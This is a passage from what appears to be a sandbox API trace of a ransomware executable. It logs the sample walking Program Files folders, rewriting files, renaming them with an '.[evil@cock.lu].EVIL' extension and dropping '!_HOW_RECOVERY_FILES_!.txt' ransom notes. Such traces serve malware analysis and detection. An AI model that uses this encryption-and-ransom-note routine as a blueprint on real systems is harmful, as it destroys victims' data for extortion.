_Source="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US") returned 0x0 [0089.142] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*" [0089.142] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd860 [0089.142] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.142] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\.") returned 64 [0089.142] wcscmp (_String1=".", _String2=".") returned 0 [0089.142] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0089.142] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.142] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\..") returned 65 [0089.142] wcscmp (_String1=".", _String2="..") returned -1 [0089.142] wcscmp (_String1="..", _String2="..") returned 0 [0089.142] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0089.142] FindClose (in: hFindFile=0x84b11dd860 | out: hFindFile=0x84b11dd860) returned 1 [0089.142] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US") returned 0x3e [0089.142] strlen (_Str="${KEY}") returned 0x6 [0089.142] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.142] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.142] strlen (_Str="${CODE}") returned 0x7 [0089.142] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.142] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.142] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.142] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.143] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.143] __uncaught_exception () returned 0x84b1160800 [0089.143] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.144] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0089.144] FindClose (in: hFindFile=0x84b11dd7a0 | out: hFindFile=0x84b11dd7a0) returned 1 [0089.144] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv") returned 0x38 [0089.144] strlen (_Str="${KEY}") returned 0x6 [0089.144] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.144] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.144] strlen (_Str="${CODE}") returned 0x7 [0089.144] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.144] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.144] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.144] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.145] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.145] __uncaught_exception () returned 0x84b1160800 [0089.145] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.146] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0089.146] wcsstr (_Str="Triedit", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.146] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit") returned 55 [0089.146] wcscmp (_String1=".", _String2="Triedit") returned -1 [0089.146] wcscmp (_String1="..", _String2="Triedit") returned -1 [0089.146] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit") returned 0x37 [0089.146] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit") returned 0x0 [0089.146] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\*" [0089.146] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd320 [0089.146] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.146] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\.") returned 57 [0089.146] wcscmp (_String1=".", _String2=".") returned 0 [0089.146] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.146] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.146] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\..") returned 58 [0089.146] wcscmp (_String1=".", _String2="..") returned -1 [0089.146] wcscmp (_String1="..", _String2="..") returned 0 [0089.146] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.146] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.146] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US") returned 61 [0089.146] wcscmp (_String1=".", _String2="en-US") returned -1 [0089.146] wcscmp (_String1="..", _String2="en-US") returned -1 [0089.146] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US") returned 0x3d [0089.146] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US") returned 0x0 [0089.146] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*" [0089.146] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddbc0 [0089.146] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.146] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\.") returned 63 [0089.146] wcscmp (_String1=".", _String2=".") returned 0 [0089.147] FindNextFileW (in: hFindFile=0x84b11ddbc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0089.147] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.147] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\..") returned 64 [0089.147] wcscmp (_String1=".", _String2="..") returned -1 [0089.147] wcscmp (_String1="..", _String2="..") returned 0 [0089.147] FindNextFileW (in: hFindFile=0x84b11ddbc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0089.147] FindClose (in: hFindFile=0x84b11ddbc0 | out: hFindFile=0x84b11ddbc0) returned 1 [0089.147] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US") returned 0x3d [0089.147] strlen (_Str="${KEY}") returned 0x6 [0089.147] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.147] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.147] strlen (_Str="${CODE}") returned 0x7 [0089.147] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.147] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.147] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.147] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.147] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.147] __uncaught_exception () returned 0x84b1160800 [0089.147] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.148] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0089.148] FindClose (in: hFindFile=0x84b11dd320 | out: hFindFile=0x84b11dd320) returned 1 [0089.148] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit") returned 0x37 [0089.148] strlen (_Str="${KEY}") returned 0x6 [0089.148] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.148] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.148] strlen (_Str="${CODE}") returned 0x7 [0089.149] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.149] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.149] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.149] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Triedit\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.149] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.149] __uncaught_exception () returned 0x84b1160800 [0089.149] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.150] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0089.150] wcsstr (_Str="VC", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.150] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VC") returned 50 [0089.150] wcscmp (_String1=".", _String2="VC") returned -1 [0089.150] wcscmp (_String1="..", _String2="VC") returned -1 [0089.150] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VC") returned 0x32 [0089.150] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\VC" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\VC") returned 0x0 [0089.150] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\*" [0089.150] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11ddc20 [0089.151] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.151] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\.") returned 52 [0089.151] wcscmp (_String1=".", _String2=".") returned 0 [0089.151] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.151] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.151] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\..") returned 53 [0089.151] wcscmp (_String1=".", _String2="..") returned -1 [0089.151] wcscmp (_String1="..", _String2="..") returned 0 [0089.151] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.151] wcsstr (_Str="msdia100.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.151] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 63 [0089.151] wcscmp (_String1="msdia100.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.151] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdia100.dll") returned 0x0 [0089.151] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 0x3f [0089.151] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0089.154] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xf1b50, lpOverlapped=0x0) returned 1 [0089.179] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.179] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.179] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.179] _errno () returned 0x84b1160840 [0089.180] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.180] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xf1b60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xf1b60, lpOverlapped=0x0) returned 1 [0089.182] CloseHandle (hObject=0x1a4) returned 1 [0089.188] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.188] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.189] __uncaught_exception () returned 0x84b1160800 [0089.189] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.189] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.[evil@cock.lu].evil")) returned 1 [0089.189] ??_V@YAXPEAX@Z () returned 0x1 [0089.192] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll", dwFileAttributes=0x0) returned 0 [0089.192] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.192] wcsstr (_Str="msdia90.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.192] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 62 [0089.192] wcscmp (_String1="msdia90.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.192] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdia90.dll") returned 0x0 [0089.192] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 0x3e [0089.192] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0089.194] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xd0d50, lpOverlapped=0x0) returned 1 [0089.256] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.256] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.256] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.256] _errno () returned 0x84b1160840 [0089.257] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.257] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xd0d60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xd0d60, lpOverlapped=0x0) returned 1 [0089.259] CloseHandle (hObject=0x1a4) returned 1 [0089.259] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.259] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.259] __uncaught_exception () returned 0x84b1160800 [0089.259] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.260] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.[evil@cock.lu].evil")) returned 1 [0089.260] ??_V@YAXPEAX@Z () returned 0x1 [0089.263] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll", dwFileAttributes=0x0) returned 0 [0089.263] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0089.263] FindClose (in: hFindFile=0x84b11ddc20 | out: hFindFile=0x84b11ddc20) returned 1 [0089.263] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VC") returned 0x32 [0089.263] strlen (_Str="${KEY}") returned 0x6 [0089.263] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.263] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.263] strlen (_Str="${CODE}") returned 0x7 [0089.263] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.264] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.264] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.264] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VC\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.265] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.265] __uncaught_exception () returned 0x84b1160800 [0089.265] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.265] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0089.265] wcsstr (_Str="VGX", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.265] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX") returned 51 [0089.265] wcscmp (_String1=".", _String2="VGX") returned -1 [0089.266] wcscmp (_String1="..", _String2="VGX") returned -1 [0089.266] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX") returned 0x33 [0089.266] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX") returned 0x0 [0089.266] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX\\*" [0089.266] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dcfc0 [0089.266] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.266] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX\\.") returned 53 [0089.266] wcscmp (_String1=".", _String2=".") returned 0 [0089.266] FindNextFileW (in: hFindFile=0x84b11dcfc0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.266] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.266] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX\\..") returned 54 [0089.266] wcscmp (_String1=".", _String2="..") returned -1 [0089.266] wcscmp (_String1="..", _String2="..") returned 0 [0089.266] FindNextFileW (in: hFindFile=0x84b11dcfc0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.266] wcsstr (_Str="VGX.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.266] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 59 [0089.266] wcscmp (_String1="VGX.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.266] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="VGX.dll") returned 0x0 [0089.266] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 0x3b [0089.266] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.267] GetLastError () returned 0x5 [0089.267] FindNextFileW (in: hFindFile=0x84b11dcfc0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0089.267] FindClose (in: hFindFile=0x84b11dcfc0 | out: hFindFile=0x84b11dcfc0) returned 1 [0089.267] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX") returned 0x33 [0089.267] strlen (_Str="${KEY}") returned 0x6 [0089.267] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.267] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.267] strlen (_Str="${CODE}") returned 0x7 [0089.267] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.267] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.267] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.267] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VGX\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.268] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.268] __uncaught_exception () returned 0x84b1160800 [0089.268] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.270] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0089.270] wcsstr (_Str="VSTO", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.270] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO") returned 52 [0089.270] wcscmp (_String1=".", _String2="VSTO") returned -1 [0089.270] wcscmp (_String1="..", _String2="VSTO") returned -1 [0089.270] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO") returned 0x34 [0089.270] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO") returned 0x0 [0089.270] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\*" [0089.270] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd500 [0089.270] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.270] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\.") returned 54 [0089.271] wcscmp (_String1=".", _String2=".") returned 0 [0089.271] FindNextFileW (in: hFindFile=0x84b11dd500, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.271] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.271] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\..") returned 55 [0089.271] wcscmp (_String1=".", _String2="..") returned -1 [0089.271] wcscmp (_String1="..", _String2="..") returned 0 